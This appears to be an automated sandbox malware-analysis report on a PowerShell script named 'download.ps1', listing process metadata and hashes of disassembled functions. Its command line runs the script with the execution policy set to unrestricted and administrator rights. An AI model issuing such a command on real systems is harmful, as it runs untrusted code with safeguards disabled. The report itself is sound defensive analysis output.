                                                                                                          Data Ascii: box-shadow:0 2px 4px rgba(0,0,0,.12);-webkit-box-shadow:0 2px 4px rgba(0,0,0,.12);box-shadow:0 2px 4px rgba(0,0,0,.12);position:relative;z-index:1}#gbd4 .gbmh{margin:0}.gbmtc{padding:0;margin:0;line-height:27px}.GBMCC:last-child:after,#GBMPAL:


                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:06:26:58
                                                                                                          Start date:09/01/2025
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                          Imagebase:0x7ff7be880000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:1
                                                                                                          Start time:06:26:58
                                                                                                          Start date:09/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Executed Functions

                                                                                                            Function 00007FF848D981D6 Relevance: .5, Instructions: 473COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2167378788.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848d80000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cc8c76e6348841ac7633de8c6bc0845ef6329a795e98c2f4d0d16e1e5bf91246
                                                                                                            • Instruction ID: 36d29e3f70eaea31ba3502c7e19ad64df9e5213f47f4ea0a160b9da4c670957c
                                                                                                            • Opcode Fuzzy Hash: cc8c76e6348841ac7633de8c6bc0845ef6329a795e98c2f4d0d16e1e5bf91246
                                                                                                            • Instruction Fuzzy Hash: 67F1A23090DA8D8FEBA8EF28C8557E937E1FF54750F14427AE84DC7291CB34A9458B86
                                                                                                            Function 00007FF848D98F82 Relevance: .5, Instructions: 458COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2167378788.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848d80000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b218bfbbb9c8791c778247260e4335b2ae77f2a38b7331fbb47ff079a7ebcede
                                                                                                            • Instruction ID: 11f847a2c4db09bbb0d8701715258409f0ee2faeb764439b95f26f0a6edeb3fc
                                                                                                            • Opcode Fuzzy Hash: b218bfbbb9c8791c778247260e4335b2ae77f2a38b7331fbb47ff079a7ebcede
                                                                                                            • Instruction Fuzzy Hash: 0BE1D23090DA4D8FEBA9EF28C8557F977E1FB54350F14426AE80DC7295DF38A8858B81
                                                                                                            Function 00007FF848D87B6C Relevance: .5, Instructions: 509COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2167378788.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848d80000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c2b823de7fb1276cb3a1be962c581afa4aa45885f4699b07227e8fa889b6f4f9
                                                                                                            • Instruction ID: 1e7e7a2a42beacf4ca558e07039eb433ed1ef73d023b8db189d1a12ea48e4c1d
                                                                                                            • Opcode Fuzzy Hash: c2b823de7fb1276cb3a1be962c581afa4aa45885f4699b07227e8fa889b6f4f9
                                                                                                            • Instruction Fuzzy Hash: 21F1AF30A1DA4D8FDB98EF58C485BA97BE1FF68350F14416AD409D7296CB34EC86CB81
                                                                                                            Function 00007FF848FD16E2 Relevance: .5, Instructions: 451COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2170108422.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848fd0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2971b7a0d87556053814c81ff479637549c2132ddb4eb1ef125742c09b55cb09
                                                                                                            • Instruction ID: 7607cff79fa67d8279c337bcc114a400649796d26bead5a5f800b9dda3b4873e
                                                                                                            • Opcode Fuzzy Hash: 2971b7a0d87556053814c81ff479637549c2132ddb4eb1ef125742c09b55cb09
                                                                                                            • Instruction Fuzzy Hash: 0FD13531D0DA895FE396EB2848592B4BBE1EF56250F1801FAC14EC71E3DE29AC85C716
                                                                                                            Function 00007FF848D870BD Relevance: .4, Instructions: 355COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2167378788.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848d80000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 02ec0bc5982769d50ee64252e6f7053af9845f1138548a1267d56c7304088359
                                                                                                            • Instruction ID: cf8c0ccd8d58937efdbc93833f704f81d2ab39bd3ca586237bee08b74d50c371
                                                                                                            • Opcode Fuzzy Hash: 02ec0bc5982769d50ee64252e6f7053af9845f1138548a1267d56c7304088359
                                                                                                            • Instruction Fuzzy Hash: E5C13C30A09A4E8FDF98EF58C485BA9B7E1FF68340F144169D419D7296CB34E885CB81
                                                                                                            Function 00007FF848D98B96 Relevance: .3, Instructions: 332COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2167378788.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848d80000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5c986433dab71a9d8569347c09cc0c3be1ebcb11e6ad080826d73f29eb6973a5
                                                                                                            • Instruction ID: 36aea101c67a6fb984f6aa5578bccf4628a2802e398b59543288666c3fae4ccd
                                                                                                            • Opcode Fuzzy Hash: 5c986433dab71a9d8569347c09cc0c3be1ebcb11e6ad080826d73f29eb6973a5
                                                                                                            • Instruction Fuzzy Hash: 3CB1E43050DA4D8FEBA8EF28D8557E93BE1FF55350F14427AE84DC7292CB34A8458B86
                                                                                                            Function 00007FF848FD1728 Relevance: .3, Instructions: 332COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2170108422.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848fd0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8ad346680d30ac6c3cbcdb8629d829546eade89e9b7e53b773f651a448c7ad6a
                                                                                                            • Instruction ID: 2632f78bea93865364bbadb4d74ca9141b28a45d890e03b682a9bcc89d18c88c
                                                                                                            • Opcode Fuzzy Hash: 8ad346680d30ac6c3cbcdb8629d829546eade89e9b7e53b773f651a448c7ad6a
                                                                                                            • Instruction Fuzzy Hash: A6A1E13190DBCA4FE396EB284859274BFE1EF56250F1901FAC14ECB1E3DA299885C716
                                                                                                            Function 00007FF849031AF0 Relevance: .3, Instructions: 326COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2170640660.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff849030000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 61973e87823622d1a5df28e0d94d5d2a22523145d5926b83d47542ac78868438
                                                                                                            • Instruction ID: cb0e04de96e1d990ab80305ed26bed4e59c15a98d684fb16b37dfc858f35f2e0
                                                                                                            • Opcode Fuzzy Hash: 61973e87823622d1a5df28e0d94d5d2a22523145d5926b83d47542ac78868438
                                                                                                            • Instruction Fuzzy Hash: 10913732E1DAC94FEBF5AA295855AB47BD2EF4A650F0801FBC04DC7193DE14EC028382
                                                                                                            Function 00007FF848D92788 Relevance: .1, Instructions: 137COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2167378788.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848d80000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3f01590d0b14e90e81e5cde183ee2e701b8cd323287a5399494ceb9807ea1205
                                                                                                            • Instruction ID: 2352905627361c3c2c8a7308f64ab6d44c7102e980e42c3d1c4135d89298e31d
                                                                                                            • Opcode Fuzzy Hash: 3f01590d0b14e90e81e5cde183ee2e701b8cd323287a5399494ceb9807ea1205
                                                                                                            • Instruction Fuzzy Hash: 5141077190DB889FDB18DF5CAC466A87BE0FB69320F00412FE459D3252DB30A8598BC6
                                                                                                            Function 00007FF848C6E620 Relevance: .1, Instructions: 124COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2166938577.00007FF848C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C6D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848c6d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 20ad0b7a51ca652e2437302de044ec48d4d8257230841b5bc2c588c1c82fecc5
                                                                                                            • Instruction ID: 0209e1125f136bab5fa1ae5dddc37dd58b39767429cff415fc81abaa30e5af2e
                                                                                                            • Opcode Fuzzy Hash: 20ad0b7a51ca652e2437302de044ec48d4d8257230841b5bc2c588c1c82fecc5
                                                                                                            • Instruction Fuzzy Hash: 6D41157180DBC48FE396DB2998459523FF0EF56360F1505EFD088CB1A3D625E846C7A2
                                                                                                            Function 00007FF849031BB1 Relevance: .1, Instructions: 119COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2170640660.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff849030000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 76a2a11a4872016f3a71eaa9528c674ba2d86471ebeb5038d93afe77d7017c7d
                                                                                                            • Instruction ID: 189275ffddce0878367fe4eda108a4b458d2cdd57bd874c76854f983997e670b
                                                                                                            • Opcode Fuzzy Hash: 76a2a11a4872016f3a71eaa9528c674ba2d86471ebeb5038d93afe77d7017c7d
                                                                                                            • Instruction Fuzzy Hash: 84310831E2D98A4FEAF5BA296495A7836D2EF48390F5801FBD40DC3187DE28EC418285
                                                                                                            Function 00007FF848D93038 Relevance: .1, Instructions: 103COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2167378788.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848d80000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 543f83623cd620f48e49f07dba549031ad1c5b270baafa7cb7da27b324ccd528
                                                                                                            • Instruction ID: 681cc9c0dd9f6263a2dc385f11a316972b1c41bd0489e848bacb24be8bd43613
                                                                                                            • Opcode Fuzzy Hash: 543f83623cd620f48e49f07dba549031ad1c5b270baafa7cb7da27b324ccd528
                                                                                                            • Instruction Fuzzy Hash: 8721E73190CB4C8FEB58DFAC984A7E97BE0EB96321F04426BD44DC3152DB74A45ACB91
                                                                                                            Function 00007FF848D98694 Relevance: .1, Instructions: 92COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2167378788.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848d80000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 50dbac2ebd4d1aec2010b28f86306b12ec1308964b4c6abbed07c3ae3c4b86f2
                                                                                                            • Instruction ID: 2c44bb948b83ddf4d7cd42eedd05e9f437c521d27c9428f5c01c21235f4e0844
                                                                                                            • Opcode Fuzzy Hash: 50dbac2ebd4d1aec2010b28f86306b12ec1308964b4c6abbed07c3ae3c4b86f2
                                                                                                            • Instruction Fuzzy Hash: 1931E73091E64E8EFBB4AF25CC1ABFA3290FF42759F404139D40D87092DB786989CE15
                                                                                                            Function 00007FF849032E56 Relevance: .1, Instructions: 65COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2170640660.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff849030000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bd23c9340aad939b313e121422453112fa4eb837dce40bd38337ea5709e159eb
                                                                                                            • Instruction ID: acefeb373276844869e0c23fba90eb4ccc192753403b3b40632a361b6241cf60
                                                                                                            • Opcode Fuzzy Hash: bd23c9340aad939b313e121422453112fa4eb837dce40bd38337ea5709e159eb
                                                                                                            • Instruction Fuzzy Hash: D1110831A0DF854FE7A4FF2D9846665B7D0FF69350F1404BFE40DC7292EA29A8808782
                                                                                                            Function 00007FF848E501B9 Relevance: .1, Instructions: 62COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2167961923.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848e50000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6e1e4eb788769ddc6472b6f3e8c4977d72c0224a6647133e95b5196b31b7acee
                                                                                                            • Instruction ID: 79680aeaabbc6461769937d97f7a04965d627785266d08c34950cd43cd11b6fb
                                                                                                            • Opcode Fuzzy Hash: 6e1e4eb788769ddc6472b6f3e8c4977d72c0224a6647133e95b5196b31b7acee
                                                                                                            • Instruction Fuzzy Hash: 8A11A53160DA858FD74EAA2898298A07BE1FB67320B1401EFD08AC75D3D929DC46C785
                                                                                                            Function 00007FF848D85395 Relevance: .0, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2167378788.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848d80000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bc5dcbd5ede653ca980044ffa226be88404f5321d5c1ea188cd2df254a297467
                                                                                                            • Instruction ID: 7d7e20967e5b1cb4f01d664bd39f6225471ee2cf6b5901c8a0d1e25c2342ea51
                                                                                                            • Opcode Fuzzy Hash: bc5dcbd5ede653ca980044ffa226be88404f5321d5c1ea188cd2df254a297467
                                                                                                            • Instruction Fuzzy Hash: 0C01447111CB0C4FDB44EF0CE451AA9B7E0FB95364F10056DE58AC3695D726E881CB45
                                                                                                            Function 00007FF848D87C68 Relevance: .0, Instructions: 39COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2167378788.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848d80000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6a42fe4b7fea3df5ad2c45d835f098c5b24f3cd18273fb9506f30d6b1783a98a
                                                                                                            • Instruction ID: b2723ba054b8aef875fbc39defa6f6c709111c03c1d1f68f7f23566b9747e457
                                                                                                            • Opcode Fuzzy Hash: 6a42fe4b7fea3df5ad2c45d835f098c5b24f3cd18273fb9506f30d6b1783a98a
                                                                                                            • Instruction Fuzzy Hash: FCF0373275C6048FDB4CAA1CF4429B573D1E795320F10056EE48BC3696E917E8468685
                                                                                                            Function 00007FF848D92E80 Relevance: .0, Instructions: 36COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2167378788.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848d80000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4d8b90ac387db4b3a8071c168b2f96e16ea0363e3bc35d05978ccc40e13709a9
                                                                                                            • Instruction ID: ed9e68008f5f5368035fdf10c297cdfa75477dd24253794df895de2587fb2892
                                                                                                            • Opcode Fuzzy Hash: 4d8b90ac387db4b3a8071c168b2f96e16ea0363e3bc35d05978ccc40e13709a9
                                                                                                            • Instruction Fuzzy Hash: 3EF0B475C0C6C98FDB0AEF6888595E57FA0FF26250F04029BE45CC71A2DB759458CB82

                                                                                                            Non-executed Functions

                                                                                                            Function 00007FF848D8CD21 Relevance: 3.4, Strings: 2, Instructions: 875COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2167378788.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848d80000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: QN_L$sN_^
                                                                                                            • API String ID: 0-2484066585
                                                                                                            • Opcode ID: 0154e39b39ff3c36b813d48cb4e1e2136c4a22ea628b50787c800bf38138ac94
                                                                                                            • Instruction ID: 28035db90c128434a5b87191640678cad6bbf93460f832ccb161dfb398ff4a04
                                                                                                            • Opcode Fuzzy Hash: 0154e39b39ff3c36b813d48cb4e1e2136c4a22ea628b50787c800bf38138ac94
                                                                                                            • Instruction Fuzzy Hash: 66521932D0E6868FEB96EB2C94656F97BA0FF51354F0800B6C05DCB187DF25A84AC794
                                                                                                            Function 00007FF848D91145 Relevance: .6, Instructions: 632COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2167378788.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848d80000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 207d915549cedcd9fcbff83d425b2c6c31ab765c4d9570d49e1d352b2ea06139
                                                                                                            • Instruction ID: 6078fcd5e38e86938af158278d51dc6fc167f4fe8c541b2761c5d9d59446283e
                                                                                                            • Opcode Fuzzy Hash: 207d915549cedcd9fcbff83d425b2c6c31ab765c4d9570d49e1d352b2ea06139
                                                                                                            • Instruction Fuzzy Hash: 5B12B73290E7D24FE716A73858651A57FB1EF57269B1940FBC088CF0A3EB1C6C0A8365